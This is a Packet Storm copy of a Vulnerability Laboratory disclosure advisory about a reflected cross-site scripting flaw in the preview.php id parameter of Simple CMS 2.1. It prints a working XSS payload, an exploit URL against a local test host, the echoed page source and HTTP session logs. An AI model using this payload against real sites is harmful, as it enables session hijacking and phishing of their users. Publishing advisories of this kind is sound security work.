exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Simplephpscripts Simple CMS 2.1 Cross Site Scripting

Simplephpscripts Simple CMS 2.1 Cross Site Scripting
Posted Oct 26, 2021
Authored by Vulnerability Laboratory | Site vulnerability-lab.com

Simplephpscripts Simple CMS version 2.1 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | f154c9c368765c769d5d0ccd4a59358723a158500b7fc185d7cdcd70e815ebd1

Simplephpscripts Simple CMS 2.1 Cross Site Scripting

Change Mirror Download
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2301


Release Date:
=============
2021-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
2301


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.


Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A non-persistent cross site scripting vulnerability has been discovered in the official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to
web-application requests by the client-side.

The cross site scripting vulnerability is located in the `id` parameter of the preview.php file. The request method to inject the malicious
script code is GET and the attack vector of the vulnerability is non-persistent. The execution of the script code occurs in the undefined
exception-handling output message.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Preview (Pages)

Vulnerable File(s):
[+] preview.php

Vulnerable Parameter(s):
[+] id

Affected Module(s):
[+] Undefined Exception-Handling (Preview)


Proof of Concept (PoC):
=======================
The non-persistent web vulnerability can be exploited by remote attackers without user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Payload
-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


PoC: Exploitation
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


Vulnerable Source: preview.php (Exception-Handling)
<html>
<head>
<meta charset="utf-8">
<title>Simple CMS page -1>"<iframe src=evil.source onload=alert(document.cookie)></title>
</head>
<body style="margin:0; padding:0;">
<script src="https://simple-cms.localhost:8000/simplecms/lightbox/js/jquery-1.11.0.min.js"></script>
<script src="https://simple-cms.localhost:8000/simplecms/lightbox/js/lightbox.min.js"></script>
<link href="https://simple-cms.localhost:8000/simplecms/lightbox/css/lightbox.css" rel="stylesheet" />
No page content with id -1>"<iframe src=evil.source onload=alert(document.cookie)>
<style type="text/css">
<!--
body {
background-color: <br />
<b>Notice</b>: Undefined variable: OptionsVis in <b>/home/test/public_html/simplephpscripts/test/simplecms/preview.php</b> on line <b>40</b><br />
;
}
-->
</style>


--- PoC Session Logs (GET) ---
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1>"<iframe src=evil.source onload=alert(document.cookie)>
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 1658
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/evil.source
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1


Reference(s):
https://simple-cms.localhost:8000/simplecms/
https://simple-cms.localhost:8000/simplecms/preview.php
https://simple-cms.localhost:8000/simplecms/preview.php?id=


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close